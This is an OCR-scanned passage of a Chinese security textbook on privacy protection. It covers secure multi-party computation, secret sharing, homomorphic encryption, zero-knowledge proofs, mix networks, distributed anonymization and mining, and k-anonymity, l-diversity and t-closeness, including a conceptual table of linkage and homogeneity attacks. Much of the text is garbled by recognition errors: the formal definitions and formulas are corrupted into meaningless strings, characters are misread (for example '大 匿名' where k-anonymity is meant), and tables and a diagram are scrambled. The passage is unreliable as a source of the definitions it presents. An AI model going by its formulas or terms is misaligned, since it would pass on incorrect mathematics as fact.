有 数据 的 敏感 属性 ， 在 这 种 情况 下 ， 这 条 记录 的 敏感 属性 信息 仍然 可 以 得 到 保护 。 因 为 
由 定义 5-1 可 知 ， 当 数据 集 D 和 DD, 之 间 只 相差 一 个 记录 时 , EEX D M D, 进行 什么 查 
询 ， 都 会 得 到 近似 “相同 ”的 查询 结果 ， 因 此 攻击 者 在 一 定 的 概率 下 无 法 推断 出 该 记录 
的 任何 敏感 属性 信息 。 
5.5.2.2 ”基于 数据 加 密 的 隐私 保护 技术 

基于 数据 加 密 的 隐私 保护 技术 所 针对 的 数据 对 象 往往 是 分 布 式 的 ， 如 分 布 式 数据 挖 
据 、 分 布 式 安全 查询 、 儿 何 计算 、 科 学 计算 等 。 在 分 布 式 环境 下 实现 隐私 保护 要 解决 的 
首要 问题 是 通信 的 安全 性 ， 而 加 密 技 术 正 好 满足 了 这 一 需求 。 

在 分 布 式 环境 下 ， 根 据 应 用 的 不 同 ， 数 据 会 有 不 同 的 存储 模式 ， 站 点 也 会 有 不 同 的 
可 信和 度 及 相应 行为 。 分 布 式 应 用 普遍 采用 两 种 模式 存储 数据 : 垂直 划分 (Vertically 
Partitioned) 的 数据 模式 和 水 平 划分 (Horizontally Partitioned) 的 数据 模式 。 垂 直 划分 数 
据 是 指 分 布 式 环境 中 每 个 站 点 只 存储 部 分 属性 的 数据 ， 所 有 站 点 存储 的 数据 不 重复 ; 水 
平 划分 数据 是 将 数据 记录 存储 到 分 布 式 环境 中 的 多 个 站 点 ,所 有 站 点 存储 的 数据 不 重复 。 
对 分 布 式 环境 下 的 站 点 (参与 者 )， 根 据 其 行为 ， 可 分 为 : 

@ 准 诚信 攻击 者 (Semi-honest Adversary): 准 诚信 攻击 者 是 遵守 相关 计算 协议 但 仍 
试图 进行 攻击 的 站 点 ; 

恶意 攻击 者 (Malicious Adversary): 恶意 攻击 者 是 不 遵守 协议 且 试图 披露 隐私 的 
站 点 。 
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一 般 地 ， 假 设 所 有 站 点 为 准 诚信 攻击 者 。 

下 面 从 分 布 式 环境 下 的 四 个 常见 应 用 : 安全 多 方 计 算 、 分 布 式 匿名 化 、 分 布 式 关 联 
规则 和 分 布 式 聚 类 入 手 ， 介 绍 相应 的 隐私 保护 技术 。 

1. 安全 多 方 计 算 

考虑 以 下 场景 : 

Alice 认为 她 得 了 某 种 遗传 疾病 ， 想 验证 自己 的 想法 。 正 好 她 知道 Bob 有 一 个 关于 
疾病 的 DNA 模型 的 数据 库 。 如 果 她 把 自己 的 DNA 样品 寄 给 Bob, 那么 Bob 可 以 给 出 她 
的 DNA 的 诊断 结果 。 但 是 Alice 又 不 想 别人 知道 ， 这 是 她 的 隐私 。 所 以 ， 她 请 求 Bob 
帮忙 诊断 自己 DNA 的 方式 是 不 可 行 的 。 因 为 这 样 Bob 就 知道 了 她 的 DNA 及 相关 私人 
信息 。 

这 个 例子 有 两 个 典型 特点 : @ 有 多 个 实体 参与 基于 各 自私 密 输 入 的 计算 ; @ 参与 
各 方 都 不 希望 其 他 方 知道 自己 的 输入 信息 。 即 在 保护 输入 数据 私密 性 的 前 提 下 实现 协同 
计算 。 

当前 ， 解 决 上 述 问题 的 策略 是 假设 有 可 信任 的 服务 提供 者 或 是 假设 存在 可 信任 的 第 
三 方 。 大 家 把 各 自 的 输入 秘密 地 交 给 这 个 可 信 方 ， 由 可 信 方 来 计算 出 结果 ， 然 后 将 相应 
的 结果 返回 给 参与 计算 的 各 方 。 但 是 在 目前 多 变 和 充满 恶意 的 环境 中 , 这 是 极 具 风险 的 ， 
很 难 找到 这 样 的 可 信 第 三 方 。 因 此 ， 可 以 支持 联合 计算 并 保护 参与 者 私密 的 协议 变 得 日 
益 重 要 ， 这 就 导致 了 安全 多 方 计 算 问 题 的 研究 。 

安全 多 方 计 算 (Secure Multi-Party Computation，SMC )， 是 解决 一 组 互 不 信任 的 参 
与 方 之 间 保 护 隐 私 的 协同 计算 问题 ，SMC 要 确保 输入 的 独立 性 ， 计 算 的 正确 性 ， 同 时 不 
泄露 各 和 输入 值 给 参与 计算 的 其 他 成 员 。 

现 有 的 许多 密码 工具 都 是 安全 多 方 计 算 的 基础 , SMC 的 关键 技术 涉及 到 秘密 分 享 与 
可 验证 秘密 分 享 、 门 限 密码 学 、 零 知识 证 明 等 多 方面 的 内 容 ， 协 议 中 应 用 的 基本 密码 算 
法 包括 各 种 公 钥 密码 体质 ， 特 别 是 语义 安全 的 同 态 公 钥 加 密 系 统 。 下 面 对 SMC 的 儿 个 
基本 协议 及 相关 的 低层 密码 算法 进行 概括 。 

(1) 秘密 分 享 与 可 验证 秘密 分 享 

秘密 分 享 (Secret Share) 是 一 种 分 发 、 保 存 和 恢复 秘密 的 方法 ， 是 实现 安全 多 方 计 
算 的 一 种 重要 工具 。(t,n) 门限 秘密 分 享 是 最 常见 的 秘密 分 享 体制 ， 秘 密 s 的 分 片 
{51,52,…,5,} FAF n ARR {ALP PRD, 至 少 需 要 i 个 成 员 才 能 重 构 s, 即使 有 1 一 1 
个 成 员 联 合 起 来 也 不 能 得 到 关于 s 的 任何 信息 ， 而 当 t 个 或 者 多 于 t 个 分 片 可 用 时 ， 就 能 
够 唯一 、 高 效 地 重 构 5 。 

早期 的 方案 中 均 假 设 所 有 参与 方 是 诚实 的 ， 即 秘密 分 享 者 (<i<n) 所 提供 的 秘密 
分 片 都 是 正确 的 ， 因 此 不 能 够 抵抗 恶意 攻击 者 的 欺骗 行 为 。 为 此 ,在 秘密 分 发 的 过 程 中 ， 
增加 验证 协议 使 各 成 员 BQ<i<n) 能够 对 分 发 的 秘密 分 片 的 正确 性 进行 验证 Verify)， 
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实现 了 可 验证 秘密 分 享 (Verifiable Secret Sharing)。 如 果 系 统 中 任何 成 员 〈 包 括 外 部 成 
R) 都 可 以 验证 秘密 分 片 s 的 正确 性 ， 则 称 可 公开 验证 秘密 分 享 。 

(2) 同 态 公 钥 密码 体制 

在 SMC 技术 所 采用 的 各 种 密码 算法 中 ， 一 个 重要 的 密码 体制 是 具有 同 态 性 质 的 公 
钥 密码 体制 。 现 有 的 几 类 同 态 加 密 方案 的 安全 性 都 是 基于 数论 中 的 著名 计算 难 解 问题 ， 
主要 包括 x 阶 剩余 假设 、 素 数 群 中 离散 对 数 假设 等 。 

设 5 为 一 公 钥 密 码 体 制 ，k 为 其 安全 参数 。 以 全 表示 消息 空间 ，C 表示 密 文 空间 ， 
XH Abel 加 法 群 ，C 为 Abel FAK, {0.1} 表示 位 长 为 的 随机 位 串 ，E.,Di 分别 表 
示 其 公开 加 密 函 数 和 解密 函数 。 

定义 5-2 语义 安全 的 同 态 公 钥 密码 体制 

Way Xt sty E {0,1}, H E, 0h.) 1 E, (3,5) 是 计算 不 可 区 分 的 ， 则 称 5 是 语 
义 安全 的 (Semantically Secure), IEK S 是 密码 学 安全 的 。 

进一步 地 ， 若 存在 ue {0,1 ， 使 得 ， Ex, +m) = Ey.) E a.m)» WES 是 
语义 安全 的 同 态 公 钥 密 码 体制 (Homomorphic Public Key Cryptography )。 

在 SMC 协 议 中 可 以 利用 同 态 加 密 机 制 实现 不 解密 地 对 加 密 后 的 数据 进行 “+” 和 “X” 
运算 ， 实 现 安全 求 和 、 安 全 求 积 。 

(3) 零 知 识 证 明 

零 知 识 证 明 (Zero Knowledge Proof-ZKP) 是 密码 学 中 的 一 个 基本 方法 ,目的 是 使 证 
明 者 P 了 向 验证 者 V 证 明 自 己 拥有 某 个 秘密 ， 同 时 P 又 不 会 向 V 泄露 该 秘密 的 任何 其 他 
有 用 的 信息 。 按 证 明 者 和 验证 者 之 间 是 否 需 要 交互 作用 ，ZKP 分 为 交互 式 和 非 交互 式 零 
知识 证 明 协 议 ， 下 面 给 出 交互 式 证 明 系 统 的 简单 定义 。 

定义 5-3 交互 式 证 明 系 统 (Interactive Proof System) 

设 工 是 {0.]} 上 的 语言 。 一 对 概率 交互 式 图 灵机 PV) 称 为 工 的 交互 式 证 明 系 统 ， 其 
中 让 是 多 项 式 时间 的 而 且 下 列 两 条 件 成 立 : 

完备 性 : xe LPA PV >0)=1]>2. 


正确 性 ， 对 任意 xe 工 和 任意 的 交互 图 灵机 也， P< BV >(x)=1]<> 


完备 性 表明 , WR XSL, 那么 至少 以 2/3 概率 接受 证 明 ; 正确 性 表明 , 如 果 xe 工 ， 
则 六 至 多 以 1/3 概率 接受 证 明 。 

一 对 交互 式 系统 (P,7) 称 为 语言 的 一 个 交互 式 零 知 识 证 明 ， 如 果 P 和 VV 间 通 过 多 
次 交互 作用 ， 己 以 很 高 的 概率 向 严 证 明 “上 断言 xe 工 成 立 ” 并 且 不 泄露 任何 其 他 知识 给 
V。 其 中 ，x 是 也 和 VV 都 知道 的 一 个 公共 输入 ， 工 是 某 种 关系 尺 指定 的 一 种 语言 。 

根据 零 知识 证 明 过 程 中 系统 的 安全 性 和 攻击 者 模型 的 不 同 ， 需 要 进一步 研究 完备 零 
知识 、 统 计 零 知识 、 计 算 零 知识 和 诚实 验证 者 的 零 知 识 (Honest Verifier Zero-knowledge) 


ool 
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等 协议 ， 以 适应 不 同 领域 的 SMC 计算 的 需要 。 

(4) 混合 网 协议 

混合 网 (Mixnets/Mix Network) 是 实现 匿名 发 送 的 基本 密码 协议 ，1981 年 Chaum D 
首次 提出 混合 网 的 概念 。 混 合 网 由 服务 网 的 集合 构成 ， 原 始 信息 输入 混合 网 ， 通 过 多 次 
秘密 置换 后 再 输出 ， 隐 藏 了 输出 消息 与 发 送 方 的 关系 ， 实 现 匿 名 消息 发 送 。 表 5-5 给 出 
了 混合 网 协议 的 原理 。 


R55 混合 网 协议 
混合 网 协议 
设 n 个 混合 网 服务 器 5.,5,,…,5, ， 每 个 S, 生成 一 对 密 钥 为 (PK,,SK,) ，5; 将 公 钥 
PK, 公开 ， 而 自己 的 私 钥 SK, 保密 。 
输入 阶段 人 m ， 执 行 加 密 Exx, (Err, C-Epr, CD 后 ， 然 后 再 发 送 
Step] 当 足 够 多 的 成 员 发 送 自己 的 消息 给 马 后 ，& 用 自己 的 私 钥 SK, 解密 收 到 的 
所 有 消息 。5 对 所 有 解密 后 的 消息 进行 随机 置换 ， 再 发 送 Epe, (…Epx, (m)) 给 S, 。 
混合 阶段 Step2 S, 用 私 钥 SK, 解密 收 到 的 所 有 消息 , 进行 随机 置换 , 将 Epxr,(…Epx, (1m)) 发 
送 给 S; 。 
Step3 53,…,5, 执行 相同 的 操作 
输出 阶段 S, 输出 原始 序列 


经 过 Mixnets 输出 的 密 文 表 是 输入 密 文 表 的 随机 置换 ， 攻 击 者 无 法 确定 它们 的 对 应 
关系 。 加 密 消 息 的 长 度 和 用 户 计算 量 与 Mixnets 服务 器 的 个 数 成 正比 ， 当 用 户 很 多 时 ， 
效率 极 低 。 对 Chaum D 混合 网 协议 效率 的 改进 ， 也 一 直 是 SMC 基础 协议 研究 的 热点 。 

2. 分 布 式 匿名 化 

在 分 布 式 环境 下 ， 数 据 匿 名 化 的 重点 问题 是 : 如 何在 通信 时 既 能 保证 站 点 数据 隐私 
不 泄露 ， 又 可 以 收集 得 到 足够 的 信息 来 满足 数据 挖掘 规则 的 要 求 ， 从 而 使 实现 的 数据 匿 
名 保护 的 利用 率 尽 量 高 

以 在 垂直 划分 的 数据 环境 下 实现 两 方 的 分 布 式 EA. PS, AS, 它们 
拥有 的 数据 分 别 为 UD, A, A oA}, HD, A An ALS HP A, A S: A BG 
第 7 个 属性 。 利 用 可 交换 加 密 在 通信 过 程 中 隐藏 原始 信息 ， 再 构建 完整 的 匿名 表 判 断 是 
否 满足 太 匿 名 条 件 来 实现 分 布 式 匿名 化 。 

在 水 平 划分 的 数据 环境 中 ， 可 以 通过 引入 第 三 方 ， 利 用 满足 以 下 性 质 的 密 钥 来 实现 
数据 的 左 匿 名 化 : 每 个 站 点 加 密 私有 数据 并 传递 给 第 三 方 ， 当 且 仅 当 有 上 条 数据 记录 的 
准 标志 符 属 性 值 相同 时 ， 第 三 方 的 密 钥 才能 解密 这 大 条 数据 记录 。 

更 一 般 地 ， 不 考虑 数据 的 具体 存储 模式 ， 一 种 能 确保 分 布 式 环境 下 隐私 安全 的 模型 
JÆ k-TTP (k-Trusted Third Party). k-TTP 利用 信任 第 三 方 ， 确 保 了 当 且 仅 当 至 少 有 天 个 
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站 点 的 信息 改变 时 ， 所 有 站 点 的 相关 统计 信息 才能 被 披露 。 太 TITP 模型 的 约束 ， 使 我 们 
不 能 揭露 少 于 丰 个 站 点 的 统计 信息 。 

3. 分 布 式 关 联 规则 挖掘 

关联 规则 挖掘 是 数据 挖掘 领域 中 的 一 个 非常 重要 的 研究 课题 ， 它 于 1993 年 由 
R.Agrawal 等 人 首先 提出 。 关 联 规 则 挖掘 就 是 从 大 量 的 数据 中 挖掘 出 描述 数据 项 之 间 相 
互联 系 的 有 价值 的 知识 。 关 联 规则 挖掘 可 以 发 现存 在 于 数据 库 中 的 项 目 或 属性 问 的 有 意 
义 的 关系 ， 这 些 关 系 是 事先 未 知 的 且 隐 藏 的 ， 也 就 是 说 不 能 通过 数据 库 的 逻辑 操作 (如 
表 的 联接 ) 或 统计 的 方法 得 出 。 

目前 人 们 对 基于 分 布 式 数据 库 的 关联 规则 挖掘 研究 并 不 太 多 ， 主 要 有 四 种 典型 的 算 
法 ， 它 们 分 别 是 PDM (Parallel Data Mining), CD (Count Distribution), FDM (Fast 
Distributed association rules Mining) 和 DMA (Distributed Mining of Association rules). 
这 四 种 算法 都 没有 考虑 安全 性 的 要 求 ， 这 是 一 个 很 大 的 缺陷 。 通 常情 况 下 ， 要 处 理 的 数 
据 都 分 布 在 很 多 独立 的 数据 库 服务 器 上 ， 它 们 相互 独立 且 自 成 一 体 ， 缺 少 安全 保证 的 数 
据 挖掘 算法 在 分 布 式 环境 下 是 不 可 靠 的 。 数 据 本 身 可 能 携带 有 一 些 敏感 信息 ， 在 对 其 进 
行 挖掘 的 过 程 中 就 可 能 发 生 隐私 泄露 ， 损 害 用 户 的 利益 。 因 此 ， 在 分 布 式 环境 下 ， 必 
须 对 待 处 理 的 数据 进行 一 定 的 隐私 保护 ， 以 保证 计算 结果 有 效 的 同时 ， 不 会 泄露 隐私 
信息 。 

(1) 水 平分 布下 关联 规则 挖掘 的 隐私 保护 算法 

数据 水 平分 布 的 关联 规则 挖掘 的 目的 是 寻找 全 局 关联 规则 。 在 水 平分 布 的 数据 库 
中 ， 一 个 项 集 的 全 局 支持 度 是 所 有 局 部 支持 度 之 和 ， 可 以 由 局 部 频繁 项 集 产生 全 局 频繁 
项 集 。 隐 私 保护 的 一 般 思路 是 保证 参与 关联 分 析 的 各 个 站 点 只 能 知道 自身 的 频繁 项 集 和 
支持 度 ， 而 无 法 知晓 其 他 站 点 的 频繁 项 集 和 支持 度 。 虽 然 参与 关联 分 析 的 各 个 站 点 需要 
共享 数据 以 及 关联 规则 ， 但 是 为 了 保护 各 自 的 隐私 ， 各 个 站 点 都 不 愿意 把 自己 数据 里 的 
敏感 信息 泄露 给 其 他 站 点 ， 因 此 在 共享 数据 之 前 需要 对 数据 进行 清洗 ， 以 消除 敏感 信息 
和 规则 。 

(2) 垂直 分 布下 关联 规则 挖掘 的 隐私 保护 算法 

数据 垂直 分 布下 的 关联 规则 挖掘 的 关键 在 于 项 集中 的 项 分 布 在 不 同 站 点 ， 需 要 在 这 
样 的 情况 下 计算 项 集 的 支持 度 。 通 过 参与 关联 分 析 的 各 个 站 点 的 中 间 数 据 计 算出 项 集 支 
持 度 ， 然 后 将 该 项 集 支持 度 同 最 小 支持 度 阔 值 进行 比较 ， 即 可 判定 该 项 集 是 否 频繁 。 隐 上 
私 保护 的 关键 在 于 如 何 安全 地 计算 出 项 集 支持 度 ， 即 在 计算 项 集 支持 度 的 同时 执行 安全 
的 协议 。 

例如 ， 在 数据 垂直 划分 的 分 布 式 环境 中 ， 需 要 解决 的 问题 是 : 如 何 利用 分 布 在 不 同 
站 点 的 数据 计算 项 集 (item set) 计数 ， 找 出 支持 度 大 于 阔 值 的 频繁 项 集 。 此 时 ， 计 算 项 
集 计数 的 问题 被 简化 为 在 保护 隐私 数据 的 同时 ， 在 不 同 站 点 间 计 算 标量 积 的 问题 。 已 有 
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计算 标量 积 的 方法 包括 引入 随机 向 量 进行 安全 计算 或 用 随机 数 代 替 真实 值 ， 然 后 用 代数 
方法 进行 计算 等 。 

4. 分 布 式 聚 类 

聚 类 是 对 记录 进行 分 组 ， 把 相似 的 记录 分 在 同一 个 聚 簇 里 ， 主 要 是 使 得 属于 同一 聚 
簇 的 个 体 的 差异 尽 可 能 小 ， 而 个 体 差 异 在 不 同 聚 秘 之 间 尽 可 能 大 。 聚 类 和 分 类 的 主要 区 
别 在 于 聚 类 不 需要 依赖 预先 定义 好 的 类 别 ， 以 及 不 需要 训练 集 。 分 布 式 聚 类 分 析 是 获得 
数据 分 布 情况 的 有 效 方法 之 一 。 比 如 ， 在 商业 上 ， 通 过 聚 类 分 析 可 以 从 客户 数据 库 中 发 
现 不 一 样 的 客户 群 ， 并 能 够 按照 客户 购买 习惯 来 描述 不 同 的 客户 群 特征 。 市 场 分 析 人 员 
通过 观察 聚 类 得 到 的 每 个 类 别 的 特点 ， 能 够 针对 性 地 对 特定 的 某 些 重点 聚 簇 做 进一步 的 
分 析 。 分 布 式 聚 类 分 析 在 诸如 市 场 细 分 、 业 绩 评估 、 目 标 客户 定位 等 方面 具有 广阔 的 应 
用 前 景 。 

基于 隐私 保护 的 分 布 式 聚 类 的 关键 是 安全 地 计算 数据 间 的 距离 。 有 以 下 两 种 常用 
模型 ; 

@ Naive 聚 类 模型 。 各 个 站 点 将 数据 用 加 密 方式 安全 地 传递 给 信任 第 三 方 ， 由 信任 
第 三 方 进行 聚 类 后 返回 结果 。 

@ 多 次 聚 类 模型 。 首 先 各 个 站 点 对 本 地 数据 进行 聚 类 并 发 布 结果 ， 再 通过 对 各 个 
站 点 发 布 的 结果 进行 二 次 处 理 ， 实 现 分 布 式 聚 类 。 不 论 哪 种 分 布 式 聚 类 模型 ， 都 利用 了 
加 密 以 实现 信息 的 安全 传输 。 当 然 ， 还 有 基于 隐私 保护 的 其 他 分 布 式 聚 类 方法 ， 如 在 任 
意 划分 数据 的 环境 下 的 mean 聚 类 算法 ， 通 过 引入 随机 数 来 保证 安全 传输 的 最 大 期 望 
(Expectation Maximization) 聚 类 算法 等 。 
5.5.2.3 ”基于 数据 匿名 化 的 隐私 保护 技术 

数据 匿名 化 即 是 有 选择 的 发 布 原始 数据 ， 不 发 布 或 者 发 布 精度 较 低 的 敏感 数据 ， 以 
实现 隐私 保护 。 当 前 此 类 技术 的 研究 主要 在 隐私 披露 风险 和 数据 精度 问 进行 折 中 ， 有 选 
择 地 发 布 敏感 数据 及 可 能 披露 敏感 数据 的 信息 ， 但 保证 对 敏感 数据 及 隐私 的 披露 风险 在 
可 容忍 范围 内 。 数 据 匿 名 化 一 般 采 用 两 种 基本 操作 ， 一 种 是 抑制 (Suppression)， 即 不 发 
布 某 些 数据 项 ， 另 一 种 是 泛 化 (Generalization)， 即 对 数据 进行 更 概括 、 抽 象 的 描述 。 数 
据 匿 名 化 研究 主要 集中 在 两 个 方面 : 一 是 研究 设计 更 好 的 匿名 化 原则 ， 使 遵循 此 原则 发 
布 的 数据 既 能 很 好 地 保护 隐私 ， 又 具有 较 大 的 利用 价值 。 另 一 方面 是 针对 特定 匿名 化 原 
则 设计 更 高 效 的 匿名 化 算法 。 

1. 数据 匿名 化 定义 

数据 匿名 化 所 处 理 的 原始 数据 ， 如 医疗 数据 、 统 计数 据 等 ， 一 般 为 数据 表 形 式 : 表 
中 每 一 条 记录 GET) 对 应 个 人 ， 包 含 多 个 属性 值 。 下 面 给 出 几 个 常见 定义 : 

FEM 5-4 原始 数据 集 T : 最 原始 待 被 公开 发 布 的 数据 集合 , 设 T{4, 系 ,…,4}， 其 
中 和 表 示 数 据 集 的 第 i 个 属性 ， 若 T 中 含有 n 条 记录 ， 则 每 条 记录 表示 为 (< Jj<n)， 
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G14] 表示 第 了 条 记录 中 属性 熏 对 应 的 值 。 

定义 5-5 标识 符 I :标识 符 是 指 可 以 用 来 唯一 识别 、 关 联 到 某 特定 个 体 的 身份 属性 ， 
是 数据 集 T 中 的 很 小 部 分 特殊 属性 ， 即 如 果 了 的 标识 符 为 7， 则 存在 了 属于 
TC{41(Q<igm)}。 例 如 姓名 、 身 份 证 号 等 属性 。 

定义 5-6 ” 准 标识 符 Q7 : 准 标 识 符 是 指 潜在 的 可 以 识别 、 关 联 到 某 特定 个 体 身份 的 
一 组 属性 集合 , 常 同时 存在 于 发 布 的 数据 表 和 外 部 数据 表 中 。 若 了 的 准 标 识 符 为 QI ， 则 
也 存在 QI c {4 11<i<m} 。 例 如 性 别 、 年 龄 、 邮 编 、 生 日 等 属性 集合 。 

定义 5-7 敏感 属性 S : 敏感 属性 是 指 那些 不 希望 被 他 人 或 非 授权 机 构 所 知晓 的 信 
息 属性 , 是 社会 中 个 体 普遍 想 要 隐匿 的 信息 。 敏 感 属性 集合 表示 为 {51,5,,…,5,} , 其 中 5, 
为 数据 表 了 中 的 第 ;个 属性 ， 则 有 S €{4,|1<i<m} 。 例 如 个 体 的 疾病 、 婚 史 、 薪 水 等 
信息 。 

定义 5-8 等 价 组 G : 以 准 标识 符 为 基础 ， 寻 找 准 标识 符 值 完全 相同 的 一 定数 量 的 
记录 ， 由 这 些 记录 组 成 的 集合 成 为 等 价 组 ， 等 价 组 的 概念 使 得 准 标识 符 失去 了 识别 、 关 
联 特 定 记 录 的 能 力 。 等 价 组 表示 为 {ti, 态 ,…,w,} ， 其 中 加 表示 数据 集 T 的 某 一 条 记录 ， 
对 于 准 标 识 符 中 的 任何 一 个 属性 2 ， 则 等 价 组 内 记录 间 的 关系 可 表示 为 
tr [Q1 ,]= tr; [QI] (ij ely. JHitzs). 

例如 , 表 5-6 IRRE E, RRIA AERA HEP EA” y 
为 标识 符 属性 ，{“ 肤 色 ”，“ 年 龄 ”， “性别 ”，“ 邮 编 ”} 为 准 标 识 符 属性 ，{“ 疾 病 ”} 为 


表 5-6 原始 数据 
[3s | s | son | VB | 
17 


男 黄色 
430012 黄色 肺炎 
男 430061 黄色 支气管 炎 
女 230015 流感 
男 230015 

2. 数据 匿名 化 原则 

1) 大 匿名 

定义 59 KIA: WOR RA TAA. A} ， 设 匿名 化 后 数据 表 为 
RT{A,4,,--4,}5 Oler 是 与 其 对 应 的 准 标识 符 ， 称 数据 表 RT 满足 匿名， 如果 
RT[OTrr] 中 的 每 个 序列 值 在 RT[OTar] 中 至 少 出 现 大 次 (大 >1)。 数 据 表 RT 中 具有 相同 
准 标识 符 的 若干 记录 称 为 一 个 等 价 类 ， 即 万 匿名 实现 了 同一 等 价 类 内 记录 之 间 无 法 区 分 
(敏感 属性 值 除 外 )， 如 表 5-7 是 表 5-6 的 2- 匿 名 化 表 。 
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R57 表 5-6 的 一 个 2- 匿 名 化 表 


左 匿 名 通常 可 以 防止 敏感 属性 值 的 泄露 ， 因 为 每 个 个 体 身份 被 准确 标识 的 概率 最 大 
WK 。 然 而 ， 数 据 表 在 匿名 化 过 程 中 并 未 对 敏感 属性 做 任何 约束 ， 这 也 可 能 带 来 隐私 
泄露 。 如 同一 等 价 类 内 敏感 属性 值 较为 集中 ， 甚 至 完全 相同 〈 可 能 形式 上 ， 也 可 能 语义 
上 )， 这 样 即 使 满足 大 匿名 要 求 ， 也 很 容易 推理 出 与 指定 个 体 相 应 的 敏感 属性 值 。 除 此 
之 外 ， 攻 击 者 也 可 以 通过 自己 掌握 的 足够 的 相关 背景 知识 以 很 高 的 概率 来 确定 敏感 数据 
与 个 体 的 对 应 关系 , 从 而 导致 隐私 泄露 。 因此, 大 匿名 容易 受到 同 质 性 攻击 (Homogeneity 
Attack) 和 背景 知识 攻击 (Background Knowledge Attack)。 表 5-8 列 出 了 几 种 常见 的 针 
对 匿名 化 模型 的 攻击 方式 。 


表 5-8 几 种 常见 的 针对 匿名 化 模型 的 攻击 方式 


几 种 常见 的 针对 匿名 化 模型 的 攻击 方式 
某 些 数据 集 存在 其 自身 的 安全 性 ， 即 孤立 情况 下 不 会 泄露 任何 隐私 信息 ， 但 是 当 
恶意 攻击 者 利用 其 他 存在 属性 重 登 的 数据 集 进 行 链接 操作 ， 便 可 能 唯一 识别 出 特 
链接 攻击 定 的 个 体 ， 从 而 获取 该 个 体 的 隐私 信息 。 如 图 5-22 所 示 ， 将 医疗 信息 和 选举 人 信 
息 结合 在 一 起 ， 能 够 发 现 两 个 数据 集 的 共有 属性 〈Zip，Birth，Date，Sex 等 )， 这 
样 恶 意 攻 击 者 通过 链接 攻击 能 够 轻易 确定 选举 人 的 医疗 信息 情况 ， 因 此 该 类 攻击 
手段 会 造成 极其 严重 的 隐私 泄露 
同 质 攻击 当 通 过 链接 攻击 仍然 无 法 唯一 确认 个 体 ， 但 是 却 存在 个 体 对 应 的 多 条 记录 拥有 同 
-个 敏感 隐私 信息 ， 从 而 造成 隐私 的 泄露 ， 称 这 一 过 程 为 同 质 攻击 
由 于 敏感 信息 往往 存在 敏感 度 类 似 的 情况 ， 攻 击 者 虽然 无 法 唯一 确定 个 体 ， 但 如 
果 个 体 对 应 的 多 条 记录 拥有 相似 敏感 信息 ， 便 能 够 推测 出 个 体 的 大 概 隐私 情况 ， 
相似 性 攻击 例如 某 个 体 患 有 极其 不 愿 为 人 所 知 的 疾病 ， 这 也 属于 一 种 无 法 回避 的 洲 重 攻击 。 
: 虽然 该 攻击 类 似 于 同 质 性 攻击 ， 并 且 不 如 同 质 性 攻击 泄露 那么 直接 ， 但 其 发 生 的 
可 能 性 极 大 ， 为 被 泄露 者 造成 的 心理 压力 往往 难以 预料 ， 因 此 需要 特别 针对 此 种 
攻击 手段 
如 果 攻 击 者 掌握 了 某 个 体 的 某 些 具体 信息 ， 通 过 链接 攻击 后 即使 只 能 得 到 某 个 体 
背景 知识 攻击 对 应 的 多 条 信息 记录 ， 并 且 记 录 间 的 敏感 属性 也 完全 不 同 或 不 相似 ， 但 攻击 者 却 
“能 够 根据 所 掌握 的 背景 知识 ， 从 多 条 信息 记录 中 找 出 唯一 对 应 的 信息 记录 ， 从 而 
获取 到 该 个 体 的 隐私 信息 


(2) I 多 样 性 
为 了 解决 同 质 性 攻击 和 背景 知识 攻击 所 带 来 的 隐私 泄露 ， 研 究 人 员 在 大 匿名 的 基础 


第 5 章 应 用 系统 安全 基础 607 E 


上 提出 了 -多样 性 C-diversity) 原则 。7-diversity 保证 每 一 个 等 价 类 的 敏感 属性 至 少 有 17 
个 不 同 的 值 ，1-diversity 使 得 攻击 者 最 多 以 1/1 的 概率 确认 某 个 体 的 敏感 信息 。 下 面 给 出 
l-diversity 的 定义 : 


oT ~~、 
/ 姓名 \、 
访问 日 其 / 人 种 地 址 y 
En \ 
i 生日 | 日 其 
诊断 结 
pa | 性 别 注册 名 | 
处 方 。 手续 \ i 政党 2 
\ Wie 7 
二 
医疗 信息 表 选民 登记 表 


图 5-22 ”链接 攻击 示例 


定义 5-10 -多 样 性 : WR RT{4 A.A 满足 大 匿名 ， 且 同一 等 价 类 中 的 记录 至 
少 有 1 个 “ 较 好 表现 ”(Well-represented) Hti, WEEKK RT {A,, A,,---,4,} KE l- 
多 样 性 的 。 其 中 “ 较 好 表现 ”有 多 种 解释 ， 如 表 5-9 所 示 。 


表 5-9 “ 较 好 表现 ”的 解释 汇总 表 


“ 较 好 表现 ”的 解释 

不 可 区 分 Ldiversity 同一 等 价 类 中 至 少 出 现 /个 不 同 的 敏感 属性 值 
同一 等 价 类 中 敏感 属性 值 的 信息 粹 Entropy(E) > log] 。 等 价 类 王 的 化 感 
SEF diversity ATERI tie Ky. Enttopy(Z)=—D" p(E.s)log p(E.s) ， 其 中 8 为 


seS 

敏感 属性 值 域 ， P(E,s) 为 敏感 属性 值 s 在 等 价 类 E 中 出 现 的 概率 

每 个 等 价 类 都 满足 石 <cCi tT tt Tin) 。 其 中 m 表示 等 价 类 中 不 同 敏 
感 属性 值 的 个 数 ，5 表 示 该 等 价 类 中 第 iQ <i<m) 频繁 的 敏感 属性 值 的 
个 数 。 递 归 (e， 因 diversity 保证 了 等 价 类 中 频率 最 高 的 敏感 属性 值 不 至 
于 出 现 频 度 太 高 

递归 (cys ca, Ddiversity 除 保证 等 价 类 中 频率 最 高 的 敏感 属性 值 不 至 于 出 现 频 度 太 高 ， 同时 还 保 

证 了 等 价 类 中 频率 最 低 的 敏感 属性 值 不 至 于 出 现 频 度 太 低 


(c, -diversity 


根据 1-diversity 的 定义 可 以 看 出 ， 表 5-8 发 布 的 匿名 化 数据 也 是 满足 2-diversity 的 ， 
每 一 个 等 价 类 中 至 少 有 2 个 不 同 的 敏感 属性 值 。 

(3) p-Sensitive k-Anonymity 

发 布 的 数据 满足 EEA k> Lp <k), KEREN RE 
少 出 现 p 个 不 同 的 敏感 属性 值 ， 这 与 不 可 区 分 Ldiversity 具有 基本 相同 的 设计 思想 。 该 


cox 医 
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匿名 化 原则 在 某 些 数据 集 上 可 能 会 带 来 很 大 的 信息 可 用 性 损失 ， 也 不 足以 抵抗 敏感 属性 
值 的 偏 斜 性 攻击 〈Skewness Attack) 和 相似 性 攻击 (Similarity Attack). 

(4) t-Closeness 

发 布 的 数据 满足 大 匿名 化 原则 的 同时 ， 还 要 求 等 价 类 内 敏感 属性 值 的 分 布 与 敏感 属 
性 值 在 匿名 化 表 中 的 总 体 分 布 的 差异 不 超过 t+ 在 -diversity 基础 上 ， 考 虑 了 敏感 属性 的 
分 布 问题 ， 它 要 求 所 有 等 价 类 中 敏感 属性 值 的 分 布 尽量 接近 该 属性 的 全 局 分 布 。 为 度量 
